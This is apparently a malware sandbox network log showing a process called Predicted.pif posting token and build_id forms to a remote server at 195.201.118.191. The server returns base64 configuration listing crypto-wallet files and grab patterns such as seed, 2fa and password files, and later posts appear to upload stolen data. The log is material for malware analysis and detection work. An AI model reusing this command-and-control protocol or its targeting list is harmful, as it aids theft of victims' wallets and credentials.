2024-08-19 04:06:19 UTC	16384	IN	Data Raw: 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
2024-08-19 04:06:19 UTC	16384	IN	Data Raw: e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 Data Ascii: `P19F$WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rtt
2024-08-19 04:06:19 UTC	16384	IN	Data Raw: 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 Data Ascii: 4D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49896	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:23 UTC	308	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 1145 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:23 UTC	1145	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 Data Ascii: ------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------KEHJKJDGCGDAKFHIDBGCCont
2024-08-19 04:06:23 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:23 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49899	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:24 UTC	307	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKFHCAKJDBKKEBFIIJJE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:24 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 Data Ascii: ------AKFHCAKJDBKKEBFIIJJEContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------AKFHCAKJDBKKEBFIIJJEContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------AKFHCAKJDBKKEBFIIJJECont
2024-08-19 04:06:25 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:25 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49901	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:25 UTC	307	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:25 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 Data Ascii: ------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------GCAKKECAEGDGCBFIJEGHCont
2024-08-19 04:06:26 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:26 UTC	2208	IN	Data Raw: 38 39 34 0d 0a 52 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e Data Ascii: 894RGVza3RvcHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49916	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:37 UTC	309	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAAAAAAAAAAAAAAAAAAA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 32481 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:37 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 Data Ascii: ------AAAAAAAAAAAAAAAAAAAAContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------AAAAAAAAAAAAAAAAAAAAContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------AAAAAAAAAAAAAAAAAAAACont
2024-08-19 04:06:37 UTC	16126	OUT	Data Raw: 46 73 61 58 70 6c 51 32 46 73 62 47 4a 68 59 32 74 42 63 6e 4a 68 65 51 41 41 56 51 42 58 5a 48 4e 54 5a 58 52 31 63 45 78 76 5a 30 31 6c 63 33 4e 68 5a 32 56 58 41 46 59 41 56 32 52 7a 55 33 56 69 63 32 4e 79 61 57 4a 6c 52 58 67 41 41 41 4d 41 51 32 39 75 63 33 52 79 64 57 4e 30 55 47 46 79 64 47 6c 68 62 45 31 7a 5a 31 5a 58 41 41 51 41 51 33 56 79 63 6d 56 75 64 45 6c 51 41 46 64 45 55 30 4e 50 55 6b 55 75 5a 47 78 73 41 47 34 45 55 6e 52 73 53 57 35 70 64 46 56 75 61 57 4e 76 5a 47 56 54 64 48 4a 70 62 6d 63 41 41 4a 38 42 54 6e 52 50 63 47 56 75 52 6d 6c 73 5a 51 41 41 62 6e 52 6b 62 47 77 75 5a 47 78 73 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: FsaXplQ2FsbGJhY2tBcnJheQAAVQBXZHNTZXR1cExvZ01lc3NhZ2VXAFYAV2RzU3Vic2NyaWJlRXgAAAMAQ29uc3RydWN0UGFydGlhbE1zZ1ZXAAQAQ3VycmVudElQAFdEU0NPUkUuZGxsAG4EUnRsSW5pdFVuaWNvZGVTdHJpbmcAAJ8BTnRPcGVuRmlsZQAAbnRkbGwuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-08-19 04:06:38 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:38 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49918	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:38 UTC	308	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 4421 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:38 UTC	4421	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 Data Ascii: ------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------HJJJECFIECBGDGCAAAEHCont
2024-08-19 04:06:39 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:39 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49920	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:39 UTC	308	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 4421 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:39 UTC	4421	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 Data Ascii: ------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------HJJJECFIECBGDGCAAAEHCont
2024-08-19 04:06:40 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:40 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49922	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:40 UTC	308	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 4421 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:40 UTC	4421	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 0d 0a 43 6f 6e 74 Data Ascii: ------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------HJJJECFIECBGDGCAAAEHContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------HJJJECFIECBGDGCAAAEHCont
2024-08-19 04:06:41 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:41 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49925	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:41 UTC	308	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIIIJJKJKFHIDGDBAKJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 3269 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:41 UTC	3269	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 34 65 65 63 36 36 31 65 66 36 36 34 33 37 34 31 66 64 66 61 32 63 32 31 32 64 65 30 35 34 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 62 34 37 62 38 37 38 37 35 62 39 37 37 34 61 66 64 64 61 39 62 32 35 32 38 65 33 38 39 64 31 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 4a 0d 0a 43 6f 6e 74 Data Ascii: ------CFIIIJJKJKFHIDGDBAKJContent-Disposition: form-data; name="token"894eec661ef6643741fdfa2c212de054------CFIIIJJKJKFHIDGDBAKJContent-Disposition: form-data; name="build_id"1b47b87875b9774afdda9b2528e389d1------CFIIIJJKJKFHIDGDBAKJCont
2024-08-19 04:06:42 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-08-19 04:06:42 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49927	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:42 UTC	309	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIIEGDBKJKEBGCBAFCF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Content-Length: 11445 Connection: Keep-Alive Cache-Control: no-cache
